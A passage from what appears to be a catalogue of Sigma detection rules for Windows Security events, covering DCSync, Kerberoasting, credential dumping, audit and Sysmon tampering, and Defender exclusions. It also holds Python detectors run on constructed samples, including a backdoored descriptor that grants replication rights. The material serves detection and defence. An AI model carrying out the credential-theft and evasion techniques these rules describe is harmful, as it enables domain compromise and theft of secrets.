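    if name == "lmcompatibilitylevel" and new_value < 3:
        # Levels 0-2 still let the client send LM / NTLMv1 responses.
        reasons.append(f"LmCompatibilityLevel={new_value}: client may send LM/NTLMv1 responses")
    elif name == "ntlmminclientsec":
        if not new_value & NTLMV2_SESSION_SECURITY:
            reasons.append("NtlmMinClientSec no longer requires NTLMv2 session security")
        if not new_value & KEY_128_BIT:
            reasons.append("NtlmMinClientSec no longer requires 128-bit encryption")
    elif name == "restrictsendingntlmtraffic" and new_value == 0:
        reasons.append("RestrictSendingNTLMTraffic=0: outgoing NTLM is unrestricted")
    return reasons


def detect(event: dict) -> Optional[dict]:
    """Report any 4657 write to the watched LSA values; mark real downgrades."""
    if event.get("EventID") != 4657:
        return None
    if LSA_KEY.lower() not in event.get("ObjectName", "").lower():
        return None
    value_name = event.get("ObjectValueName", "")
    if value_name.lower() not in WATCHED_VALUES:
        return None
    new_value = parse_dword(event.get("NewValue") or 0)
    reasons = downgrade_reasons(value_name, new_value)
    return {
        "value": value_name,
        "old": event.get("OldValue"),
        "new": new_value,
        "process": event.get("ProcessName"),
        "subject": event.get("SubjectUserName"),
        "downgrade": bool(reasons),
        "reasons": reasons,
    }


def run_detector(events: Iterable[dict]) -> List[dict]:
    return [r for r in (detect(e) for e in events) if r]


# Constructed sample events (not real telemetry); keys follow event 4657.
def _ev(value_name, old, new, process="C:\\Windows\\System32\\reg.exe", key=LSA_KEY):
    return {"EventID": 4657, "ObjectName": key, "ObjectValueName": value_name,
            "OldValue": old, "NewValue": new, "ProcessName": process,
            "SubjectUserName": "jdoe"}

SAMPLE_EVENTS = [
    _ev("LmCompatibilityLevel", "5", "0"),            # downgrade
    _ev("NtlmMinClientSec", "537395200", "0"),        # downgrade, two reasons
    _ev("RestrictSendingNTLMTraffic", "2", "0"),      # downgrade
    _ev("Security Packages", "", "", process="C:\\Windows\\regedit.exe"),  # not watched
    _ev("LmCompatibilityLevel", "0", "5",
        process="C:\\Windows\\System32\\gpupdate.exe"),  # hardening, reported but not a downgrade
]

if __name__ == "__main__":
    for finding in run_detector(SAMPLE_EVENTS):
        print(finding)
```

Event 4657 only exists if a SACL on the Lsa key audits Set Value; Group Policy refreshes will also write these values, so the process and subject fields are what separate a policy push from reg.exe run by a user.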

VSSAudit Security Event Source Registration

Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.

The tag is: misp-galaxy:sigma-rules="VSSAudit Security Event Source Registration"

VSSAudit Security Event Source Registration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9015. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml

Password Change on Directory Service Restore Mode (DSRM) Account

The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.

The tag is: misp-galaxy:sigma-rules="Password Change on Directory Service Restore Mode (DSRM) Account"

Password Change on Directory Service Restore Mode (DSRM) Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9016. Table References

Links

https://adsecurity.org/?p=1714

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml

Service Registry Key Read Access Request

Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.

The tag is: misp-galaxy:sigma-rules="Service Registry Key Read Access Request"

Service Registry Key Read Access Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9017. Table References

Links

https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml

Invoke-Obfuscation STDIN+ Launcher - Security

Detects obfuscated use of stdin to execute PowerShell.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - Security"

Invoke-Obfuscation STDIN+ Launcher - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9018. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml

Powerview Add-DomainObjectAcl DCSync AD Extend Right

Detects the backdooring of a domain object to grant the rights associated with DCSync to a regular user or machine account, using the PowerView Add-DomainObjectAcl cmdlet with the DCSync extended right. This allows the attacker to re-obtain the password hashes of any user or computer at will.

The tag is: misp-galaxy:sigma-rules="Powerview Add-DomainObjectAcl DCSync AD Extend Right"

Powerview Add-DomainObjectAcl DCSync AD Extend Right has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9019. Table References

Links

https://twitter.com/menasec1/status/1111556090137903104

https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml
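What the rule above has to recognise is a new ACE on the domain head that grants the replication control-access rights to a principal that should not hold them. The following is an added example, not the Sigma rule and not MISP code: it parses the SDDL string that a Security event 5136 carries in AttributeValue when nTSecurityDescriptor changes, and reports allow-ACEs granting the three replication rights (or all extended rights) to trustees outside an expected set. The right GUIDs are the schema-defined ones; the expected-trustee aliases, the sample descriptor and the SIDs are assumptions of the example.

```python
import re
from typing import Iterable, List, Optional

# Control-access-right GUIDs whose combination is what "DCSync" needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# SDDL aliases for principals that legitimately hold replication rights on the
# domain head (assumption for this example; extend with your own SIDs, for
# instance a directory-synchronisation service account).
EXPECTED_TRUSTEES = {"SY", "BA", "DA", "EA", "ED", "DD"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def rights_tokens(rights: str) -> set:
    # SDDL access-right strings are concatenated two-letter codes, e.g. "RPWPCR".
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def dcsync_grants(sddl: str, expected: set = EXPECTED_TRUSTEES) -> List[dict]:
    """Return allow-ACEs that hand replication rights to an unexpected trustee."""
    findings = []
    for ace in ACE_RE.findall(sddl):
        parts = ace.split(";")
        if len(parts) < 6:
            continue
        ace_type, _flags, rights, object_guid, _inherit_guid, trustee = parts[:6]
        if ace_type not in ("A", "OA"):       # only access-allowed ACEs grant anything
            continue
        tokens = rights_tokens(rights)
        guid = object_guid.lower()
        if guid in REPLICATION_RIGHTS and "CR" in tokens:
            granted = REPLICATION_RIGHTS[guid]
        elif not guid and ("CR" in tokens or "GA" in tokens):
            # Control access with no object GUID covers every extended right.
            granted = "all extended rights (no object GUID)"
        else:
            continue
        if trustee in expected:
            continue
        findings.append({"trustee": trustee, "right": granted, "ace": f"({ace})"})
    return findings


def detect(event: dict) -> Optional[dict]:
    """5136 fires per attribute change; the new descriptor is the AttributeValue."""
    if event.get("EventID") != 5136:
        return None
    if event.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor":
        return None
    grants = dcsync_grants(event.get("AttributeValue", ""))
    if not grants:
        return None
    return {"object": event.get("ObjectDN"), "changed_by": event.get("SubjectUserName"),
            "grants": grants}


def run_detector(events: Iterable[dict]) -> List[dict]:
    return [r for r in (detect(e) for e in events) if r]


# Constructed sample: a domain-head descriptor after Add-DomainObjectAcl gave a
# regular user (RID 1105) both replication rights (not real telemetry).
BACKDOORED_SDDL = (
    "O:DAG:DAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPLCLORC;;;AU)"
)

SAMPLE_EVENTS = [
    {"EventID": 5136, "ObjectDN": "DC=corp,DC=local", "ObjectClass": "domainDNS",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "AttributeValue": BACKDOORED_SDDL,
     "SubjectUserName": "jdoe"},
    {"EventID": 5136, "ObjectDN": "CN=jdoe,CN=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "helpdesk",
     "SubjectUserName": "jdoe"},
]

if __name__ == "__main__":
    for finding in run_detector(SAMPLE_EVENTS):
        print(finding)
```

Get-Changes plus Get-Changes-All on the domain head is the pair that matters; Get-Changes alone does not return secrets. Reviewing the whole descriptor rather than only the added ACE also catches the case where the right was already present before auditing was enabled.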

Suspicious Outbound Kerberos Connection - Security

Detects suspicious outbound network activity on the default Kerberos port (88), indicating possible lateral movement or first-stage privilege escalation via delegation.

The tag is: misp-galaxy:sigma-rules="Suspicious Outbound Kerberos Connection - Security"

Suspicious Outbound Kerberos Connection - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9020. Table References

Links

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml

Suspicious Remote Logon with Explicit Credentials

Detects suspicious processes logging on with explicit credentials

The tag is: misp-galaxy:sigma-rules="Suspicious Remote Logon with Explicit Credentials"

Suspicious Remote Logon with Explicit Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9021. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml

Important Windows Event Auditing Disabled

Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.

The tag is: misp-galaxy:sigma-rules="Important Windows Event Auditing Disabled"

Important Windows Event Auditing Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9022. Table References

Links

https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit

https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml

Invoke-Obfuscation CLIP+ Launcher - Security

Detects obfuscated use of Clip.exe to execute PowerShell.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - Security"

Invoke-Obfuscation CLIP+ Launcher - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9023. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml

Reconnaissance Activity

Detects activity such as "net user administrator /domain" and "net group domain admins /domain".

The tag is: misp-galaxy:sigma-rules="Reconnaissance Activity"

Reconnaissance Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 9024. Table References

Links

https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml

Invoke-Obfuscation Via Use Clip - Security

Detects obfuscated PowerShell that uses Clip.exe in scripts.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - Security"

Invoke-Obfuscation Via Use Clip - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9025. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml

Windows Pcap Drivers

Detects Windows Pcap driver installation based on a list of associated .sys files.

The tag is: misp-galaxy:sigma-rules="Windows Pcap Drivers"

Windows Pcap Drivers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 9026. Table References

Links

https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pcap_drivers.yml

Remote Task Creation via ATSVC Named Pipe

Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe.

The tag is: misp-galaxy:sigma-rules="Remote Task Creation via ATSVC Named Pipe"

Remote Task Creation via ATSVC Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 9027. Table References

Links

https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml

Replay Attack Detected

Detects a possible Kerberos replay attack on the domain controllers, when a "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client.

The tag is: misp-galaxy:sigma-rules="Replay Attack Detected"

Replay Attack Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

Table 9028. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml

Sysmon Channel Reference Deletion

Detects a potential threat actor tampering with the Sysmon manifest and eventually disabling it.

The tag is: misp-galaxy:sigma-rules="Sysmon Channel Reference Deletion"

Sysmon Channel Reference Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9029. Table References

Links

https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8

https://twitter.com/SecurityJosh/status/1283027365770276866

https://twitter.com/Flangvik/status/1283054508084473861

https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml

Credential Dumping Tools Service Execution - Security

Detects well-known credential dumping tools execution via service execution events

The tag is: misp-galaxy:sigma-rules="Credential Dumping Tools Service Execution - Security"

Credential Dumping Tools Service Execution - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9030. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml

DPAPI Domain Master Key Backup Attempt

Detects anyone attempting a backup of the DPAPI Master Key. This event is generated at the source host and not on the Domain Controller.

The tag is: misp-galaxy:sigma-rules="DPAPI Domain Master Key Backup Attempt"

DPAPI Domain Master Key Backup Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

Table 9031. Table References

Links

https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml

SCM Database Handle Failure

Detects non-system users failing to get a handle to the SCM database.

The tag is: misp-galaxy:sigma-rules="SCM Database Handle Failure"

SCM Database Handle Failure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 9032. Table References

Links

https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security

Detects obfuscated PowerShell via the VAR++ launcher.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9033. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml

New or Renamed User Account with '$' Character

Detects the creation or renaming of a user account whose name contains the "$" character. This can be used by attackers to hide a user or to trick detection systems that lack the parsing mechanisms.

The tag is: misp-galaxy:sigma-rules="New or Renamed User Account with '$' Character"

New or Renamed User Account with '$' Character has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9034. Table References

Links

https://twitter.com/SBousseaden/status/1387743867663958021

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml

Windows Network Access Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder’s content (i.e. renaming files) without changing them on disk.

The tag is: misp-galaxy:sigma-rules="Windows Network Access Suspicious desktop.ini Action"

Windows Network Access Suspicious desktop.ini Action has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 9035. Table References

Links

https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml

Tap Driver Installation - Security

Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.

The tag is: misp-galaxy:sigma-rules="Tap Driver Installation - Security"

Tap Driver Installation - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 9036. Table References

Links

https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml

PetitPotam Suspicious Kerberos TGT Request

Detects suspicious Kerberos TGT requests. Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step is to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning; we recommend filtering Account_Name against the Domain Controller computer accounts.

The tag is: misp-galaxy:sigma-rules="PetitPotam Suspicious Kerberos TGT Request"

PetitPotam Suspicious Kerberos TGT Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 9037. Table References

Links

https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/

https://github.com/topotam/PetitPotam

https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml

Potential Privileged System Service Operation - SeLoadDriverPrivilege

Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes which are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) as well as the usage of Sysinternals and various other tools, so you have to work with a whitelist to find the bad stuff.

The tag is: misp-galaxy:sigma-rules="Potential Privileged System Service Operation - SeLoadDriverPrivilege"

Potential Privileged System Service Operation - SeLoadDriverPrivilege has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9038. Table References

Links

https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml

Invoke-Obfuscation VAR+ Launcher - Security

Detects obfuscated use of environment variables to execute PowerShell.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - Security"

Invoke-Obfuscation VAR+ Launcher - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9039. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml

Windows Defender Exclusion Reigstry Key - Write Access Requested

Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusion Reigstry Key - Write Access Requested"

Windows Defender Exclusion Reigstry Key - Write Access Requested has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9040. Table References

Links

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml

Meterpreter or Cobalt Strike Getsystem Service Installation - Security

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

The tag is: misp-galaxy:sigma-rules="Meterpreter or Cobalt Strike Getsystem Service Installation - Security"

Meterpreter or Cobalt Strike Getsystem Service Installation - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 9041. Table References

Links

https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml

Suspicious Kerberos RC4 Ticket Encryption

Detects service ticket requests using RC4 encryption type

The tag is: misp-galaxy:sigma-rules="Suspicious Kerberos RC4 Ticket Encryption"

Suspicious Kerberos RC4 Ticket Encryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9042. Table References

Links

https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity

https://adsecurity.org/?p=3458

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml
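As an added example, not code from the MISP galaxy or the Sigma project, the following applies the RC4 service-ticket heuristic to constructed event ID 4769 records: an issued ticket with TicketEncryptionType 0x17 for a service that is neither a machine account nor krbtgt. Assumptions: the events are dictionaries keyed by the Security log's field names, the TicketOptions value of a normal client TGS-REQ is 0x40810000, failed requests report encryption type 0xffffffff, and every account name and address is invented.

```python
RC4_HMAC = "0x17"            # TicketEncryptionType for RC4-HMAC (etype 23)
AES256 = "0x12"              # AES256-CTS-HMAC-SHA1-96, shown for contrast
TGS_OPTIONS = "0x40810000"   # TicketOptions of a normal client TGS-REQ (assumption)
FAILED_ETYPE = "0xffffffff"  # reported when no ticket was issued (assumption)

SAMPLE_4769 = [  # constructed sample events, not real log data
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": AES256, "TicketOptions": TGS_OPTIONS, "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": RC4_HMAC, "TicketOptions": TGS_OPTIONS, "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": RC4_HMAC, "TicketOptions": TGS_OPTIONS, "IpAddress": "::ffff:10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "TicketOptions": TGS_OPTIONS, "IpAddress": "::ffff:10.0.0.7"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "FS01$",
     "TicketEncryptionType": RC4_HMAC, "TicketOptions": TGS_OPTIONS, "IpAddress": "::ffff:10.0.0.7"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": FAILED_ETYPE, "TicketOptions": TGS_OPTIONS, "IpAddress": "::ffff:10.0.0.7"},
]


def is_rc4_service_ticket(ev):
    """True when a 4769 record is an issued RC4 service ticket for a
    non-machine, non-krbtgt service: the Kerberoasting pattern."""
    if ev.get("EventID") != 4769:
        return False
    if ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
        return False  # AES tickets, and failed requests (0xffffffff), are not of interest
    if ev.get("TicketOptions", "").lower() != TGS_OPTIONS:
        return False
    service = ev.get("ServiceName", "")
    # Machine accounts ('$' suffix) and krbtgt are excluded: an RC4 ticket for
    # them is not the roastable user-service-account case this rule targets.
    if service.endswith("$") or service.lower().startswith("krbtgt"):
        return False
    return True


def kerberoast_candidates(events):
    """Group hits by requesting client so one host pulling RC4 tickets for
    many services stands out; returns {client_ip: sorted service names}."""
    hits = {}
    for ev in events:
        if is_rc4_service_ticket(ev):
            ip = ev.get("IpAddress", "?").replace("::ffff:", "")
            hits.setdefault(ip, set()).add(ev["ServiceName"])
    return {ip: sorted(names) for ip, names in hits.items()}


if __name__ == "__main__":
    for ip, names in kerberoast_candidates(SAMPLE_4769).items():
        print(ip, "requested RC4 service tickets for:", ", ".join(names))
```

A single RC4 ticket can be legitimate where a service account has no AES keys; the count of distinct services per client over a short window is what separates a Kerberoasting run from a legacy application.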

Windows Defender Exclusion List Modified

Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusion List Modified"

Windows Defender Exclusion List Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9043. Table References

Links

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

